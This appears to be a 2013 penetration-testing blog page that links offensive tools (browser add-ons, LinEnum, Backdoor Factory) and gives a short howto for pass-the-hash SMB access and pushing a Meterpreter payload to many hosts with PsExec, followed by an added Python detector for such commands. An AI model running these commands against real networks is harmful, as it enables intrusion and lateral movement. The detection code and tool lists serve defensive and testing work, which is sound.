Aug 24, 2013

Tools: 11 Firefox Add-ons a Hacker Must Have and use

For full details of all the tools, see the Source.

1. Tamper Data
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

2. Firebug
https://addons.mozilla.org/en-US/firefox/addon/firebug/
 
3. Hackbar
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

4. Cookies Manager +
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

5. NoScript
https://addons.mozilla.org/en-us/firefox/addon/noscript/

6. Grease Monkey
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

7. User Agent Switcher
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

8. CryptoFox
https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

9. SQL Inject Me
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/ 

10. XSS ME
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

11. Passive Recon
https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
 



Source: http://www.hackingloops.com/2013/08/11-firefox-addons-hacker-must-have-use.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Top Five Cisco IOS Commands

For details of all the commands, see the Source.

 1. show interfaces
 2. copy running-config startup-config
 3. show ip route
 4. show ip interface brief
 5. show running-config   


Source: http://blog.router-switch.com/2012/08/top-five-cisco-ios-commands-every-network-admin-should-know/


Aug 20, 2013

Howto: Dropping Shell And PSexec

smbclient //192.168.1.120/c$ -U Administrator -p 4ECC0E7568976B7EAAD3B435B51404EE:551E3B3215FFD87F5E037B3E3523D5F6
 
 
 
 
meterpreter > upload /my/local/path/to/metr.exe \\users\\MrClickHappy\\metr.exe
meterpreter > upload /my/local/path/to/PsExec.exe \\users\\MrClickHappy\\PsExec.exe
meterpreter > upload /my/local/path/to/targets.txt \\users\\MrClickHappy\\targets.txt
meterpreter > shell
Process 3052 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\MrClickHappy> PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe

This command will use the existing user's credentials to copy the Meterpreter payload to the remote system (-c), overwrite the file if it already exists (-f), run it with elevated permissions (-h), not wait for the process to terminate (-d), and disable the EULA prompt (-accepteula). A list of targets has been provided (@) so the command will keep running and eventually find a winner.
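A defender's view of the command above, as an added example that is not part of the original post: a triage function for process-creation command lines (for example from Sysmon Event ID 1 or Windows Security event 4688 with command-line logging) that flags PsExec started with a target list and -c. The host names and log lines are constructed, and the function names are hypothetical.

```python
import re

# Flags seen in the command on this page, with the meanings the post gives.
FLAG_MEANING = {
    "-c": "copy the program to the remote system",
    "-f": "overwrite the file if it already exists",
    "-h": "run with elevated permissions",
    "-d": "do not wait for the process to terminate",
    "-accepteula": "disable the EULA prompt",
}
# Matches PsExec.exe / PsExec64.exe with or without a directory prefix.
PSEXEC_IMAGE = re.compile(r"(^|[\\/])psexec(64)?(\.exe)?$", re.IGNORECASE)

# Constructed sample events: (host, command line). Not real log data.
SAMPLE_EVENTS = [
    ("WS-017", r"C:\Users\MrClickHappy\PsExec.exe @targets.txt "
               r"-accepteula -c -f -h -d metr.exe"),
    ("ADM-02", r"C:\Tools\PsExec.exe \\fileserver01 -s ipconfig /all"),
    ("WS-031", r"C:\Windows\System32\cmd.exe /c dir"),
]

def triage(cmdline):
    """Return None for non-PsExec commands, else a dict of findings.

    Assumption: the image path contains no spaces (plain whitespace split).
    """
    tokens = cmdline.split()
    if not tokens or not PSEXEC_IMAGE.search(tokens[0].strip('"')):
        return None
    args = tokens[1:]
    flags = sorted({a.lower() for a in args if a.lower() in FLAG_MEANING})
    target_lists = [a[1:] for a in args if a.startswith("@") and len(a) > 1]
    # A target list plus -c means one binary pushed to many hosts at once.
    mass_push = bool(target_lists) and "-c" in flags
    return {"flags": flags, "target_lists": target_lists,
            "severity": "high" if mass_push else "low"}

def scan(events):
    """Return (host, finding) for every event that launched PsExec."""
    hits = []
    for host, cmdline in events:
        finding = triage(cmdline)
        if finding:
            hits.append((host, finding))
    return hits

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding["severity"], finding["flags"], finding["target_lists"])
```

A single-host administrative PsExec call is still reported, but at low severity, so the alert stays usable where PsExec is a normal admin tool.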


Source:
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://www.christophertruncer.com/dropping-payloads-with-credentials
http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf







Tools: LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks

Scripted Local Linux Enumeration & Privilege Escalation Checks 

High-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
      • Current IP
      • Default route details
      • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • List all users including uid/gid information
    • List root accounts
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xinetd.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default root/root access to local MYSQL services
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
     
Source: https://github.com/rebootuser/LinEnum




Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes in handy when analyzing how certain malware species try to communicate with the outside world.

Source: https://github.com/tomchop/malcom



Aug 18, 2013

Tools: The Backdoor Factory

Backdoors win32 PE files by patching the exe/dll directly, so that normal file execution continues (if the shellcode supports it).
Some executables have built-in protections, so this will not work on all PE files. It is advisable to test target PE files before deploying them to clients or using them in exercises.
Win32 binaries now run on x64 working with ASLR for proper continued execution after shellcode has run.

Source: https://github.com/secretsquirrel/the-backdoor-factory



Tools: Introspy - Monitor app in your iDevice

Introspy - an open-source security profiler for iOS. Introspy is designed to help penetration testers understand what an application does at runtime.

Source: http://isecpartners.github.io/introspy/

